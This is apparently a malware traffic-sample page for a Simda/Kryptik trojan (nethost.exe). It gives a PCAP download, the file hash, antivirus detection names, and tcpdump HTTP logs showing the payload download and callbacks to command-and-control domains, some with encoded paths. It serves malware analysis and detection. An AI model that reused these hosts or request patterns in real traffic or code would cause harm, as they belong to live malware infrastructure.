Text Example

Simda Kryptik PUP Trojan Malware nethost.exe PCAP File download Traffic Sample determineport.ru g.purecontinue.ru

Download Attachments

  • 1 pcap nethost
    Date added: January 16, 2017 6:36 am Added by: admin File size: 47 KB Downloads: 116
SHA256: 4b7e44ab5e74b69db9742cc59642538bc39be03977e1c1db8a9ed709130e77ef
File name: nethost.exe
Detection ratio: 15 / 56
Analysis date: 2017-01-16 06:23:30 UTC ( 1 minute ago )
AhnLab-V3 PUP/Win32.LoadMoney.R193200 20170115
Avira (no cloud) TR/Crypt.XPACK.Gen7 20170115
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9892 20170113
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/Kryptik.COWS 20170116
Fortinet W32/Kryptik.COWS!tr 20170116
Ikarus Trojan.Simda 20170115
Invincea virtool.win32.obfuscator.caf!bit 20170111
K7AntiVirus Trojan ( 004f58c41 ) 20170115
K7GW Trojan ( 004f58c41 ) 20170116
Kaspersky UDS:DangerousObject.Multi.Generic 20170116
Malwarebytes Trojan.Dropper 20170116
Qihoo-360 Win32/Trojan.cb1 20170116
Symantec Heur.AdvML.B 20170115
Tencent Win32.Trojan.Kryptik.Htct 201701

2017-01-15 23:35:58.432477 IP 192.168.1.102.62819 > 193.238.152.150.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /nethost.exe HTTP/1.1
E..XB.@….R…f…..c.P..8>?F.GP…….GET /nethost.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: qcqwyfknkmhym.boresunlight.top
Connection: Keep-Alive

2017-01-15 23:36:45.534332 IP 192.168.1.102.62823 > 185.14.29.161.80: Flags [P.], seq 4266694692:4266694855, ack 2929581312, win 256, length 163: HTTP: GET /index.htm HTTP/1.1
E…R.@……..f…..g.P.P.$….P…I1..GET /index.htm HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: closetpillow931.ru
Connection: Keep-Alive

2017-01-15 23:36:46.183272 IP 192.168.1.102.62824 > 5.9.43.189.80: Flags [P.], seq 1838734449:1838734627, ack 598866226, win 256, length 178: HTTP: GET /index.html?v=3&eh=&ts=0&a= HTTP/1.1
E…;!@….(…f.       +..h.Pm..q#..2P…S…GET /index.html?v=3&eh=&ts=0&a= HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: determineport.ru
Connection: Keep-Alive

2017-01-15 23:36:46.902193 IP 192.168.1.102.62825 > 185.20.186.51.80: Flags [P.], seq 1918876800:1918877115, ack 3026667545, win 256, length 315: HTTP: GET /1/WxYZBRdRVR5PFkIaA1xaHVJCVEheXUREVVRaXlUNWExQHF5UBV1YSQ0JQgVRTQAeDQJWTBQZUlwEEggPDlIAEwVaBV9VCBBeUV9fWUFVDQ0JQFVfCwoGFFRKCxVRXixbQgcFHhoaUkpMAFUaVxVXUhocEFtdWUJe HTTP/1.1
E..cJh@…y….f…3.i.Pr_…gH.P…b…GET /1/WxYZBRdRVR5PFkIaA1xaHVJCVEheXUREVVRaXlUNWExQHF5UBV1YSQ0JQgVRTQAeDQJWTBQZUlwEEggPDlIAEwVaBV9VCBBeUV9fWUFVDQ0JQFVfCwoGFFRKCxVRXixbQgcFHhoaUkpMAFUaVxVXUhocEFtdWUJe HTTP/1.1
User-Agent: Mozilla / 5.0 (Windows NT 6.3; WOW64; Trident / 7.0; rv:11.0) like Gecko
Host: g.purecontinue.ru
Connection: Keep-Alive

Leave a Reply